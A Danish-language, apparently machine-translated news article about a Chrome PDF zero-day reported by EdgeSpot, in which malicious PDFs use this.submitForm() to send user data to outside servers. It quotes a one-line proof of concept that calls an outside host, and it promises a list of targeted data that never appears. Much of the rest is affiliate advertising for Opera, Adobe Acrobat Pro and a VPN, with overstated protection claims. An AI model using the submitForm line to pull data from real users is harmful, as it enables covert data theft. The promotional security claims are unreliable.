browsere

Chrome bug lader hackere indsamle brugerdata via PDF-filer

Chrome bug lader hackere indsamle brugerdata via PDF-filer

Udnyttelsesdetekteringstjeneste EdgeSpot opdagede en spændende Chrome nul-dags sårbarhed, der udnytter PDF-dokumenter.

Sårbarheden giver angribere mulighed for at høste følsomme data ved hjælp af ondsindede PDF-dokumenter, der er åbnet i Chrome. 

Så snart offeret åbner de respektive PDF-filer i Google Chrome, begynder et ondsindet program at arbejde i baggrunden ved at indsamle brugerdata.

Dataene videresendes derefter til den eksterne server, der styres af hackerne. Du undrer dig måske over, hvilke data der suges af angriberne, de målretter mod følgende data på din pc:

Pas på PDF-filer, der er skadet af malware

Eksperter så det ene af de to domæner readnotify [.] com eller burpcollaborator [.] net modtog dataene.

De afslørede, at angriberne bruger this.submitForm () PDF Javascript API til at indsamle de følsomme oplysninger fra brugerne.

Vi testede det med en minimal PoC, et simpelt API-opkald som this.submitForm ('http://google.com/test') får Google Chrome til at sende de personlige data til google.com.

Denne Chrome-fejl blev udnyttet af to forskellige sæt ondsindede PDF-filer, som begge blev cirkuleret i henholdsvis oktober 2017 og september 2018.

Især kan de indsamlede data bruges af angriberne til at finjustere angreb i fremtiden. Rapporter antyder, at den første batch af filer blev kompileret ved hjælp af ReadNotify's PDF-sporingstjeneste.

Brugere kan bruge tjenesten til at holde styr på brugervisningerne. EdgeSpot har ikke delt nogen detaljer vedrørende karakteren af ​​det andet sæt PDF-filer.

Hurtigt tip: Skift din browser til Opera

I disse urolige tider bliver vi angrebet med malware, phishing og trojanere ved hvert trin, så vi skal være meget mere opmærksomme og forblive beskyttet.

Og da dette er et specifikt problem for Chrome, kan du undgå denne trussel og alle andre med en sikkerhedsorienteret browser som Opera.

Denne browser leveres med en indbygget annonceblokker, der ikke kun rydder sådanne distraktioner, men også blokerer analysescript, sporingspixels og metoder til at indsamle dine data. 

Og hvis du vil være helt sikker på, at du holder dig væk fra enhver fare, skal du komme bag den indbyggede VPN-tjeneste, der er 100% gratis at bruge i ubegrænset tid.

Opera

Opera tilbyder den perfekte trusselsbeskyttelse med den indbyggede ad-blocker og VPN-tjeneste gratis! Få det gratis Besøg webstedet

Hvordan kan jeg forblive beskyttet mod PDF-sårbarheder?

Download Adobe Acrobat PRO

Adobe og Chrome passer godt sammen, når det gælder håndtering af PDF-filer. Ved at installere Adobe Extension til Chrome kan du gennemse og manipulere PDF-filer efter eget valg uden at forlade din yndlingsbrowser.

På trods af sin robuste struktur bliver malware muligvis ikke gemt i PDF-filer, hvis du bruger standardversionen af ​​Reader.

Den professionelle version anbefales for at garantere din beskyttelse og holde dine data væk fra hackere.

Selvom det ikke er gratis, er den pris, du betaler, ret lille for den overflod af ekstra funktioner, du vil nyde, inklusive den forbedrede sikkerhed i dine PDF-filer.

Der er også en 7-dages gratis prøveperiode inkluderet, så du kan få en smag af den fulde Pro-oplevelse, før du foretager købet.

Adobe Acrobat PRO

Hold dig væk fra malware ved at downloade Adobe Acrobat PRO. Det har masser af flere funktioner end den gratis version og holder dine data sikre. Gratis prøveversion Besøg webstedet Læs mere

Hvis du vil være sikker, mens du surfer på internettet, skal du få et fuldt dedikeret værktøj til at sikre dit netværk.  Installer privat internetadgang nu og sikr dig selv. Det beskytter din pc mod angreb under browsing, maskerer din IP-adresse og blokerer al uønsket adgang.

Exploit-detektionstjenesten EdgeSpot ønskede at advare Chrome-brugerne om de potentielle risici, fordi patch ikke forventedes frigivet i den nærmeste fremtid.

EdgeSpot rapporterede til Google om sårbarheden sidste år, og virksomheden lovede at frigive en patch i slutningen af ​​april.

Du kan dog overveje at bruge en midlertidig løsning på problemet ved at se de modtagne PDF-dokumenter lokalt ved hjælp af en anden læserapp.

Alternativt kan du også åbne dine PDF-dokumenter i Chrome ved at afbryde dine systemer fra internettet.

FAQ: Få flere oplysninger om Chrome-udvidelser

Ja det gør. Men hvis du vil have et bredere udvalg, skal du udforske vores topvalg til Chrome-privatlivsudvidelser i denne komplette vejledning.

Der er mange udvidelser, der tillader behandling af PDF-filer. Se vores fremragende guide om de bedste PDF-udvidelser til Chrome.

Det gør det ikke, men du kan aktivere det hurtigt. Her er vores omfattende guide til, hvordan du aktiverer QR-kodegeneratoren i Chrome.

Redaktørens note: Dette indlæg blev oprindeligt offentliggjort i april 2020 og er siden blevet moderniseret og opdateret i august 2020 for friskhed, nøjagtighed og omfattende.

vinduer Microsoft afslører 'ID @ Xbox' Xbox One Indie Self-Publishing Program
Microsoft afslører 'ID @ Xbox' Xbox One Indie Self-Publishing Program
Microsoft ønsker at gøre alt, hvad der kræves for at fremme den kommende Xbox One bedre. Til det har Redmond-firmaet meddelt, at det vil tillade uafhæ...
vinduer Sådan opdateres fra Windows 8.1 Preview til Windows 8.1
Sådan opdateres fra Windows 8.1 Preview til Windows 8.1
Opdatering fra Se version af Windows 8.1 til den endelige og officielle Windows 8.1 er anderledes end når du opdaterer fra Windows 8, Windows 8 Pro el...
vinduer Køb Windows 8.1 til en billigere pris Bedste tilbud og rabatter
Køb Windows 8.1 til en billigere pris Bedste tilbud og rabatter
Hvis du ønsker at spare et par kroner med dit Windows 8.1-køb, kan du læse nedenfor for at finde ud af nogle billige måder at gøre det på Windows 8.1...